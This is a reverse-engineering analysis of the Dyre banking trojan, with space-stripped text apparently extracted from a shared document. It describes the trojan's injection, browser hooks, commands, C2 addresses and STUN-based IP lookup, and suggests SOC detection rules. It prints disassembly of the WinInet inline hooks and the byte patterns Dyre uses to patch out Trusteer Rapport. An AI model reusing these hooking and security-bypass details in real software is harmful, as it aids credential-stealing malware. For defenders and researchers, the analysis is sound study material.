iexplore.exe
Process Injection
TheprocessinjectionusesNtMapViewOfSection,VirtualAlloc,NtQuerySystemInformation,
OpenThreadandNtQueueApcThreadratherthanthestandardWriteProcessMemory,
SetThreadContextandCreateRemoteThread.
Host IP Retrieval
GetsIPfromstunserverorthirdpartyservice.PleaseseethesectionNetworkTraffic
Patternsformoredetails.
VNC
ThecoderesponsibleforVNCisaseparatemodule.Itisnotpresentintheexecutable.The
modulelookstobeaDLLthathasthreeknownexportsofClientSetModule,VncStartServer
andVncStopServer.ThelaterexportnamesarepresentintheCarberpsourceleakat
Carberp/sourceabsource/pro/allsource/hvnc_dll/HVNCLib/hvnc.h.Thereisthepossibility
thisisamodifiedversionoftheleakedcodebutwithoutthemodulethereisnowaytoknow
forsure.Thissamefunctionisalsousedforthetv32cmd.Themodulesareinternallynamed
VNCModuleandTVModule.
Otherfunctionalitynotworthresearching
DecryptingoffilesstoredasRCDATAintheresources
Creationandexecutionoffilesinthe%TEMP%directory
Storesconfigurationinalogfile
RequireshavingSeDebugPrivilegerights
Collectsinformationaboutthehost.
Redirects
Commands & Configurations

Commands & Configurations
Someoftheseareinternalcommandthatarepassedthroughthenamedpipewhileotherare
commandsfromthecommandandcontrol.
sfile sendfile
logkeys
logpostlogPOSTrequests
cert
vnc32
tv32
bcc
browsnapshot
generalinfo
httprdc
btidpassedonthepipe
ccsr
btnt
slip
pls
spp
setp
newpnewprocess.
slpr
ppsr
Injects Configurations
TheconfigurationsforthebrowserinjectsarestoredasXML.Theseareusedinstage7inthe
injectedprocess.Therearethreeparenttagsserverlist,localitemsandrpci.

<serverlist>
<server>
<sal>BANK_URL</sal>
<saddr>ATTACKER_IP:PORT</saddr>
</server>
</serverlist>
<localitems>
<litem>
SUB.BANK_URL.com/FOLDER/*
SUB.BANK_URL1.com/FOLDER/*
SUB.BANK_URL2.com/FOLDER/*
</litem>
</localitems>
UnfortunatelyIcouldnotfindanexampleforrpci.
Error Codes
Dyrehasanextensiveerrorhandlingandfeedbackforthedevelopers.Errorhandling
functionalitycanbefoundthroughoutthecode
0FCC20002hChromePEParsingfailed
0FCC20000hUnknownChromerelated
0FCC10001hFireFoxHookfailed
0FCC10000hUnknownFireFoxrelated
0FCCC0001hInternetExplorerWinInethookfailed
0FCCC0000hInternetExplorerWinInetparsingfailedortimestampnotfound
Hooks
Processspecifichooksforloggingbrowsertraffic.Thehookshappeninstage7which
happensintheinjectedprocess.Theinjectedprocessnamewillbefirefox.exe,chrome.exeor
iexplore.exe.
FireFox Hooks
ThesampleusesthestandardapproachtohooktrafficinFirefox.Itattemptstoload
NSPR4.DLLorNSS3.DLL.ItwillthencallGetProcAddresstogettheaddressandthenaddan
inlinehookforthefollowingAPIs.
PR_Read
PR_Write
PR_Close
ParsesthebelowrequestifPR_Writeiscalled
GET
PUT
POST
ParsesthebelowrequestifPR_Readiscalled
HTTP
HTTPS
POST
ThehookingofPR_ReadandPR_WritehasbeenusedbymalwaresinceatleastDecember
of2009.Likelyearlierduetothefirstpostdiscussingthistechniquewasbyausernamed
oxmanontheMozillaforumsinJanuaryof2007.
Internet Explorer Hooks

ThefirsttwohooksuseaGetProcAddressapproachtofindtheaddressLoadLibraryExWand
CreateProcessInternalW.WhenhookingWinInet.dllDyredoessomethingratherunique.It
doesthistobypassheuristicbaseddetection.DyrewillreadthetimestampofWinInet.dlland
thencompareittoalistofothertimestampsforWinInet.dll.Thelistcontainseverytime
stampforWinInet.dllsince'2004080401:53:22'to'2014072504:04:59'.
seg000:00A0C05F
db
0
seg000:00A0C060TimeStampListdd4110941Bh
DATAXREF:TimeStamp:_loopr
seg000:00A0C064dword_A0C064dd0
DATAXREF:TimeStamp+1Cr
seg000:00A0C064
TimeStamp:loc_A07A0Dr...
seg000:00A0C068
dd411095F2h<Timestamp
seg000:00A0C06C
dd0
<WinInetindex
seg000:00A0C070
dd4110963Fh
seg000:00A0C074
dd0
seg000:00A0C078
dd4110967Dh
seg000:00A0C07C
dd0
seg000:00A0C080
dd411096D4h
seg000:00A0C084
dd0
seg000:00A0C088
dd411096DDh
seg000:00A0C08C
dd0
seg000:00A0C090
dd41252C1Bh
seg000:00A0C094
dd0
seg000:00A0C098
dd41252C9Fh
seg000:00A0C09C
dd0
seg000:00A0C0A0
dd41253332h
seg000:00A0C0A4
dd0
seg000:00A0C0A8
dd41F9216Ch
seg000:00A0C0AC
dd1
seg000:00A0C0B0
dd435862A0h
seg000:00A0C0B4
dd2
seg000:00A0C0B8
dd43C2A6A9h
seg000:00A0C0BC
dd3
....
seg000:00A0D230
dd4CE7BA3Fh
seg000:00A0D234
dd78h
seg000:00A0D238
dd53860FB3h
seg000:00A0D23C
dd79h
seg000:00A0D240
dd53D22BCBh
seg000:00A0D244
dd7Ah
>>>datetime.datetime.fromtimestamp(0x411095F2).strftime('%Y%m%d%H:%M:%S')
'2004080401:53:22'
>>>datetime.datetime.fromtimestamp(0x53D22BCB).strftime('%Y%m%d%H:%M:%S')
'2014072504:04:59'
Ifanerroroccursduringtheparsingprocessthesamplewillcheckifthehashofthedllis
knowntotheserver.Ifnot,itwillusethe"sfile"commandtosendthefilebacktothe
commandandcontrol.
'/%s/%s/63/file/%s/%s/%s/'
"Checkwininet.dllonserverfailed"
"Sendwininet.dllfailed"
Ifthetimestampisfoundthevaluebelowisusedasanindextograbtheaddressofwhere
thehookshouldhappen.Forexampleifthetimestampwas4802A13Ahitwouldbefoundat
the49thentry.
seg000:00A0C1E8
dd4802A13Ah<'2008041318:11:38'
seg000:00A0C1EC
dd15h<21index
seg000:00A07A0D
movsxedx,wordptrds:TimeStampIndex[eax*8]edx=21
seg000:00A07A15
lea
edx,[edx+edx*2]edx=63
seg000:00A07A18
mov edx,ds:offset[edx*4]
seg000:00A07A1F
mov [ecx],edx
saveoffvalue
Python>hex(0x0A0D3E0+(21+21*2)*4)
0xa0d4dc
seg000:00A0D4DC
dw0F3Ch0x0f3Coffsettoinlinehookinwininet
*ICSecureSocket::Send_Fsm(CFsm_SecureSend*)

77200F37
90
NOP
77200F38
90
NOP
77200F39
90
NOP
77200F3A
90
NOP
77200F3B
90
NOP
77200F3CE9C7F0398A JMP015A0008<Inlinehook
015A0008
684077A000 PUSH0A07740
015A000D
C3
RETN
00A07740
00A07741
00A07743
00A07746
00A07749
00A0774E
00A07751
00A07754
00A0775A
00A0775D
00A07760
00A07763
00A07765
55
PUSHEBP
8BEC
MOVEBP,ESP
83EC08
SUBESP,8
894DFC
MOVDWORDPTRSS:[EBP4],ECX
682077A000 PUSH0A07720
FF7508
PUSHDWORDPTRSS:[EBP+8]
FF75FC
PUSHDWORDPTRSS:[EBP4]
FF1594DEA000CALLDWORDPTRDS:[A0DE94]
8945F8
8B4DFC
MOVECX,DWORDPTRSS:[EBP4]
8B45F8
8BE5
MOVESP,EBP
5D
POPEBP
*ICSecureSocket::Receive_Fsm(classCFsm_SecureReceive*)
77201D4AE9B9E23B8A JMP015C0008
015C0008
689077A000 PUSH0A07790
015C000D
C3
RETN
00A07790
00A07791
00A07793
00A07796
00A07799
00A0779E
00A077A1
00A077A4
00A077AA
00A077AD
00A077B0
00A077B3
00A077B5
00A077B6
55
PUSHEBP
8BEC
MOVEBP,ESP
83EC08
SUBESP,8
894DFC
MOVDWORDPTRSS:[EBP4],ECX
687077A000 PUSH0A07770
FF7508
PUSHDWORDPTRSS:[EBP+8]
FF75FC
PUSHDWORDPTRSS:[EBP4]
FF1598DEA000CALLDWORDPTRDS:[A0DE98]
8945F8
8B4DFC
MOVECX,DWORDPTRSS:[EBP4]
8B45F8
8BE5
MOVESP,EBP
5D
POPEBP
C20400
RETN4
Chrome Hooks
ThefirsthookisLoadLibraryExW.Therestofthehooksfailed.Willinvestigateatalaterdate.
Anti-Detection functionality
Thefirststageisrandomizedandtypicallyhasalowdetectionscore
ProcessinjectionofaDLLthatisnotlistedasaloadedmodule.
Disabling/PatchingofTrusteerintheinjectedprocess.Thishappensinstage7.
Pleaseseebelowformoredetails.
Disabling RapportGP
ChecksifRapportGP.dllisaloadedmodulewithinthebrowser.Iffounditsearchesforaset
ofbytesandthenpatchesit.Thetwobytepatternsandthereplacedbytescanbefound
below.
FirstBytesSearched
seg000:00A0C0008BC6
mov eax,esi
seg000:00A0C0028B4C2450
mov ecx,[esp+50h]
seg000:00A0C00664890D000000+
mov largefs:0,ecx
seg000:00A0C00D59
pop ecx
seg000:00A0C00E5F
pop edi
seg000:00A0C00F5E
pop esi
seg000:00A0C0105B
pop ebx
seg000:00A0C0118BE5
mov esp,ebp
seg000:00A0C0135D
pop ebp
seg000:00A0C014C20400
retn 4
FirstBytesPatched
seg000:00A0C018
seg000:00A0C01831C0
xor
eax,eax
seg000:00A0C01A8B4C2450
mov ecx,[esp+arg_4C]
seg000:00A0C01E64890D000000+ mov largefs:0,ecx
seg000:00A0C02559
pop ecx
seg000:00A0C0265F
pop edi
seg000:00A0C0275E
pop esi
seg000:00A0C0285B
pop ebx
seg000:00A0C0298BE5
mov esp,ebp
seg000:00A0C02B5D
pop ebp
seg000:00A0C02CC20400
retn 4
2ndBytesSearched
seg000:00A0C0308BC6
mov eax,esi
seg000:00A0C0328B4C2458
mov ecx,[esp+58h]
seg000:00A0C03664890D00+
mov largefs:0,ecx
seg000:00A0C03D59
pop ecx
seg000:00A0C03E5F
pop edi
seg000:00A0C03F5E
seg000:00A0C0405B
seg000:00A0C0418BE5
seg000:00A0C0435D
seg000:00A0C044C20400
2ndBytesPatched
seg000:00A0C04831C0
seg000:00A0C04A8B4C2458
seg000:00A0C04E64890D00+
seg000:00A0C05559
seg000:00A0C0565F
seg000:00A0C0575E
seg000:00A0C0585B
seg000:00A0C0598BE5
seg000:00A0C05B5D
seg000:00A0C05CC20400
pop
pop
mov
pop
retn
esi
ebx
esp,ebp
ebp
4
xor
eax,eax
mov ecx,[esp+58h]
mov largefs:0,ecx
ecx
edi
esi
ebx
esp,ebp
ebp
4
pop
pop
pop
pop
mov
pop
retn
Command and Control

Third Party Resources
abuse.chSSLFingerprintBlacklistforSuricata
https://sslbl.abuse.ch/blacklist/sslblacklist.rules
URLs & IPs

ThebelowIPswereextractedfrommemorydumpsfromDyresamples.Thisisasmallset.
188.165.209.117:19001
https://www.virustotal.com/en/ipaddress/188.165.209.117/information/
188.165.214.17:19000
188.165.216.217:19000
216.55.182.19:19000
37.59.42.107:19000
94.23.0.200:19000
94.23.2.19:19000
94.23.221.154:19000

94.23.236.54:15000
Network Traffic Patterns

Whentestingthenetworkconnectionitwillmakearequesttogoogle.comormicrosoft.com.
TheinitialURLischosenrandomly.Itwillattempttochecktheconnectionforaminuteand
half.
No. Time
Source
Destination
ProtocolLengthInfo
57203.133562192.168.195.129 74.125.225.164
TCP 62
remoteas>
http[SYN]Seq=0Win=64240Len=0MSS=1460SACK_PERM=1
58203.18709274.125.225.164
192.168.195.129
TCP 60
http>
remoteas[SYN,ACK]Seq=0Ack=1Win=64240Len=0MSS=1460
59203.188628192.168.195.129 74.125.225.164
TCP 54
remoteas>
http[ACK]Seq=1Ack=1Win=64240Len=0
69210.736318192.168.195.129 74.125.225.164
TCP 54
remoteas>
http[FIN,ACK]Seq=1Ack=1Win=64240Len=0
70210.74779874.125.225.164
192.168.195.129
TCP 60
http>
remoteas[ACK]Seq=1Ack=2Win=64239Len=0
71210.78758374.125.225.164
192.168.195.129
TCP 60
http>
remoteas[FIN,PSH,ACK]Seq=1Ack=2Win=64239Len=0
72210.787877192.168.195.129 74.125.225.164
TCP 54
remoteas>
http[ACK]Seq=2Ack=2Win=64240Len=0
OnceitcanverifythemachinehasaconnectionitwilltrytogetthemachinesIPaddress
througharequesttoastun(SessionTraversalUtilitiesforNAT)server.Dryewillrandomly
chooseoneofthefollowingstunservers.
stun1.voiceeclipse.net
stun.callwithus.com
stun.sipgate.net
stun.ekiga.net
stun.ideasip.com
stun.internetcalls.com
stun.noc.amsix.net
stun.phonepower.com
stun.voip.aebc.com
stun.voipbuster.com
stun.voxgratia.org
stun.ipshka.com
stun.faktortel.com.au
stun.iptel.org
stun.voipstunt.com
stunserver.org
203.183.172.196:3478
s1.taraba.net
s2.taraba.nete
stun.l.google.com:19302
stun1.l.google.com:19302
stun.schlund.de
stun.rixtelecom.se
stun.voiparound.com
numb.viagenie.ca
stun.stunprotocol.org
stun.2talk.co.nz
FromaSOCperspective,rulescouldbecreatedforaDNSrequesttogoogle.comor
microsoft.comandthenaconnectiontooneoftheabovestunservers.Iftheinitialrequestis
google.comitwouldbeobviousnottoflagonaconnectiontoagooglehostedstunserver.
WhilesearchingforsamplesIfounditraretoseenonmaliciousexecutablesconnecttothe
nongooglestunservers.IftheattemptofthegettingthemachinesIPfailsusingastunserver
itwilluseathirdpartysiteicanhazip.comforreturningtheIPaddress.
Appendix:
Strings
Stage 6 - Dyre
!ThisprogramcannotberuninDOSmode.
_RichL
.text
.rdata
@.data
.rsrc
%s:%d
%d/%s/%s
empty
Win_7
Win_7_SP1
Win_XP
Win_8
Win_8.1
Win_Server_2003
Win_Vista_SP2
Win_Vista
Win_Vista_SP1
unknown
_32bit
/%s/%s/0/%s/%d/%s/
/%s/%s/%d/%s/
/%s/%s/%d/%s/%s/
/%s/%s/5/%s/%s/
Wget/1.9+cvsstable(RedHatmodified)
vnc32
httprdc
/%s/%s/23/%d/%s/%s/
%s/%s/0
error
noname
RtlTimeToSecondsSince1970
text/plaincharset=UTF8
image/jpeg
text/plain
%sbound%d
ContentDisposition:formdataname="%s"
ContentType:
%s
ContentType:multipart/formdataboundary=
ContentLength:
Accept:text/html
Connection:KeepAlive
%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%0
2X
%s_W%d%d%d.%s
botid
success
0.0.0.0:0
config
http://icanhazip.com
NoNAT
FullConeNAT
UDPFirewall
PortrestrictedNAT
AddressrestrictedNAT
SymmetricNAT
unknownNAT
CONSTRAINT
%I64d
"profile"
"info_cache"
tablecookiescookies
indexsqlite_autoindex_cookies_1cookies
tablemoz_cookiesmoz_cookies
NSS_Initialize
NSS_Shutdown
PR_Init
PR_Cleanup
PL_ArenaFinish
SECITEM_AllocItem
SECITEM_DupItem
SECITEM_ZfreeItem
SEC_PKCS12EnableCipher
SEC_PKCS12SetPreferredCipher
SEC_PKCS12CreateExportContext
SEC_PKCS12DestroyExportContext
SEC_PKCS12CreateUnencryptedSafe
SEC_PKCS12CreatePasswordPrivSafe
SEC_PKCS12AddCertAndKey
SEC_PKCS12AddPasswordIntegrity
SEC_PKCS12Encode
CERT_GetDefaultCertDB
CERT_DestroyCertList
PORT_UCS2_UTF8Conversion
PORT_SetUCS2_ASCIIConversionFunction
PK11_Authenticate
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_ListCerts
PK11_NeedUserInit
PK11_InitPin
SEC_PKCS12DecoderStart
SEC_PKCS12DecoderUpdate
SEC_PKCS12DecoderImportBags
SEC_PKCS12DecoderFinish
SEC_PKCS12DecoderVerify
SEC_PKCS12DecoderValidateBags
\Mozilla\Firefox\
profiles.ini
IsRelative
secmod.db
%d.%d.%d.%d
browsnapshot
generalinfo
canotgetconfig
backconn
startfail
ClientSetModule
VncStartServer
VncStopServer
222289DD9234C9CA94E3E60D08C77777
VNCModule
TVModule
AUTOBACKCONN
startfailed
cannotgetVNC
cannotgetTV
sendbrowsersnapshotfailed
sendsysteminfofailed
bcsrv
1609uk4
C~h!f@
<assemblyxmlns="urn:schemasmicrosoftcom:asm.v1"manifestVersion="1.0">
<trustInfoxmlns="urn:schemasmicrosoftcom:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevellevel="asInvoker"
uiAccess="false"></requestedExecutionLevel
</requestedPrivileges>
</security>
</trustInfo>
00000001E00D00001001E00D 00*02090c0m0x0
SeDebugPrivilege
ntdll.dll
Tu2xwersd1
\\.\pipe\cmvn5e4d4r
Roaming
Local
d6r5g4da.db
google.com
microsoft.com
stun1.voiceeclipse.net
stun.callwithus.com
stun.sipgate.net
stun.ekiga.net
stun.ideasip.com
stun.internetcalls.com
stun.noc.amsix.net
stun.phonepower.com
stun.voip.aebc.com
stun.voipbuster.com
stun.voxgratia.org
stun.ipshka.com
stun.faktortel.com.au
stun.iptel.org
stun.voipstunt.com
stunserver.org
203.183.172.196:3478
s1.taraba.net
s2.taraba.net
stun.l.google.com:19302
stun.schlund.de
stun.rixtelecom.se
stun.voiparound.com
numb.viagenie.ca
stun.stunprotocol.org
stun.2talk.co.nz
*.txt
\Google\Chrome\UserData\
LocalState
%s%hs\Cookies
\Mozilla\Firefox\
profiles.ini
IsRelative
\cookies.sqlite
12345
CurrentVersion
SOFTWARE\Mozilla\MozillaFirefox
SOFTWARE\Mozilla\MozillaFirefox\
\Main
InstallDirectory
nss3.dll
SOFTWARE\Microsoft\WindowsNT\CurrentVersion\TimeZones\
Display
DisplayName
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GoogleChrome
DisplayVersion
Version
MozillaFirefox
svcVersion
SOFTWARE\Microsoft\InternetExplorer
InternetExplorer
1s3bu472s
tgdx6dr85
du1xdfy2dv
Software\Microsoft\Windows\CurrentVersion\Uninstall
SYSTEM\CurrentControlSet\services
Global\553wwerdty7
D:P(AGASY)(AGABA)(AGAWD)(AGARC)S:(MLNWLW)
chrome.exe
firefox.exe
iexplore.exe
Stage 7 - Injected Process
!ThisprogramcannotberuninDOSmode.
.text
.rdata
@.data
.rsrc
@.reloc
9POST
=HTTPt
=POST
x"tXSV
=GETt
=PUTt
=POST
VWjj
=HTTPt
=POST
=GETt
=PUTt
=POST
VWjj
9POST
=HTTPt
=POST
GETt
PUTt
SSPh@
wY0!w
LoadLibraryExW
/%s/%s/%d/%s/
/%s/%s/%d/%s/%s/
%s/%s/0
error
/%s/%s/63/checkfile/%s/%s/
Wget/1.9+cvsstable(RedHatmodified)
/%s/%s/63/file/%s/%s/%s/
sfile
image/jpeg
text/plain
%sbound%d
ContentDisposition:formdataname="%s"
ContentType:
%s
ContentType:multipart/formdataboundary=
ContentLength:
Accept:text/html
Connection:KeepAlive
ContentLength:
Host:
Connection:
TransferEncoding:
Cookie:
Referer:
XCSRFToken:
XRequestedWith:
ContentType:
NSPR4.DLL
NSS3.DLL
PR_Read
PR_Write
PR_Close
RapportGP.dll
CreateProcessInternalW
gdm12479s:
litem
saddr
server
serverlist
<rpci
</rpci>
wininet.dll
Sendwininet.dllfailed
Checkwininet.dllonserverfailed
Errorcode%x,%s
Errorcode%x
AUTOBACKCONN
logkeys
not_support
logpost
XForwardedFor:%s
BotInfo:%s%s
success
0.0.0.0:0
botnetfail
127.0.0.1
XXXXXXXXXXXXXXXXXXXXXXXXxbotidremoved
1609uk4
0.0.0.0
<assemblyxmlns="urn:schemasmicrosoftcom:asm.v1"manifestVersion="1.0">
<trustInfoxmlns="urn:schemasmicrosoftcom:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevellevel="asInvoker"
uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDI
NGXXPADDINGPADDINGXXPAD
0E0N0
3P3T3
chrome.dll
kernel32.dll
\\.\pipe\cmvn5e4d4r
WinInet.dll
kernelbase.dll
iexplore.exe!test
\system32\wininet.dll
firefox.exe
chrome.exe
iexplore.exe
Third Party Analysis

http://phishme.com/projectdyrenewratslurpsbankcredentialsbypassesssl
http://blog.spiderlabs.com/2014/07/analysisofabankingtrojanspammedbycutwail.h
tml
https://techhelplist.com/index.php/spamlist/511sageaccountinginvoicennnvirus
http://www.proofpoint.com/threatinsight/posts/dyrezaasaservice.php
http://thegoldenmessenger.blogspot.com/2014/07/dyrebankerakacdilakawin32win6
4.html
http://www.virusradar.com/en/Win32_Battdil/chart/history
http://stopmalvertising.com/malwarereports/analysisofdyrezachangesnetworktraffi
c.html
http://blog.trendmicro.com/trendlabssecurityintelligence/acloserlookatdyremalwar
epart1/
OldestdiscussiononFireFoxhooking
http://forums.mozillazine.org/viewtopic.php?t=514691

Dyre Analysis

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Dyre Analysis

Uploaded by

Copyright:

Available Formats

DyreInfectionAnalysisbyAlexanderHanel

General Details and Functionality

Commands & Configurations

Internet Explorer Hooks

Command and Control

URLs & IPs

Network Traffic Patterns

Stage 7 - Injected Process

Third Party Analysis

You might also like